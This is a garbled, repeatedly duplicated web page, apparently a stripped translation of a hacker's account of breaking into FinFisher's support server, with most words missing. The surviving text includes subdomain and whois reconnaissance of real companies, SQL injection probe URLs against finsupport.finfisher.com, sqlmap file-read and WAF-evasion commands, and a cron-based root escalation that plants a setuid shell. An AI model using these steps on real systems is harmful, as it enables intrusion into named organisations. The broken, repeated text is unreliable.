https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

